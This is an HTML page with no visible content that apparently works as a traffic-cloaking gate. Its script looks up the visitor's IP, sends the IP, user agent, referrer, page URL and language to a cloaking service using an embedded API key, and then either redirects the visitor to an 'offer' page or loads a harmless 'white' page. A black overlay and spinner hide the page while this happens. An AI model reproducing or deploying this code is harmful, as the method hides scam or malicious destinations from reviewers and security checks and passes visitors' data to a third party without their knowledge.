<!DOCTYPE html>
<html lang="en">
<head> 
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title></title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <script src="https://code.jquery.com/jquery-3.7.0.min.js"></script>
    <style>
      body {
	font-family: 'Segoe UI', Tahoma, sans-serif;
	font-size: 75%"
      }
      body { display: none; }
      #overlay {
        position: fixed; top: 0; left: 0; width: 100%; height: 100%;
        background-color: #000; display: flex; align-items: center;
        justify-content: center; z-index: 9999;
	font-family: 'Segoe UI', Tahoma, sans-serif;
	font-size: 75%"
      }
      #spinner {
        display: inline-block; width: 20px; height: 20px; border: 2px solid #666;
        border-top-color: #000; border-radius: 50%; animation: spin 0.5s ease-in-out infinite;
      }
      @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
    </style>
    <script>
    window.addEventListener("load", function() {
      const body = document.body;
      const overlay = document.createElement("div");
      overlay.id = "overlay";
      const spinner = document.createElement("div");
      spinner.id = "spinner";
      body.style.display = "block";
      body.appendChild(overlay);
      overlay.appendChild(spinner);
    });
    (async function() {
      try {
        const response = await fetch("https://api64.ipify.org?format=json");
        const data = await response.json();
        if (data || data.ip) {
          let apiUrl = `https://api.icloaker.com/?ip=${encodeURIComponent(data.ip)}&domain=${encodeURIComponent(window.location.hostname)}&campaign=f9103ebf-7c36-4270-a191-248042d67d2e&apiKey=39a20c1921712830f4da44afa88f239d&userAgent=${encodeURIComponent(window.navigator.userAgent)}&page=${encodeURIComponent(window.location.href)}&referer=${encodeURIComponent(document.referrer)}&language=${encodeURIComponent(navigator.language)}`;
          const resultResponse = await fetch(apiUrl);
          const result = await resultResponse.json();
          if (result.error && result.error.includes('Domain/Campaign is not allowed')) {
            alert(result.error);
          } else {
            let targetUrl = result.goToOffer ? result.offerpage : result.whitepage;
            if (isURL(targetUrl)) {
              window.location.href = targetUrl;
            } else {
              $('body').load(targetUrl + '?_=' + new Date().getTime(), function(response, status, xhr) {
                if (status === "error") {
                  alert("Page not found");
                }
              });
            }
          }
        }
      } catch (error) {
        console.error("Error: ", error);
      }
    })();
function isURL(str) {
    var pattern = new RegExp('^(https?:\\/\\/)?(www\\.)?([a-zA-Z\\d]+(-[a-zA-Z\\d]+)*\\.)+[a-zA-Z]{2,}(:\\d+)?(\\/[\\w\\-\\.~:+?#%&=]*)?$', 'i');
    return pattern.test(str);
}
    </script>
	
</head>
<body>

</body>
</html>
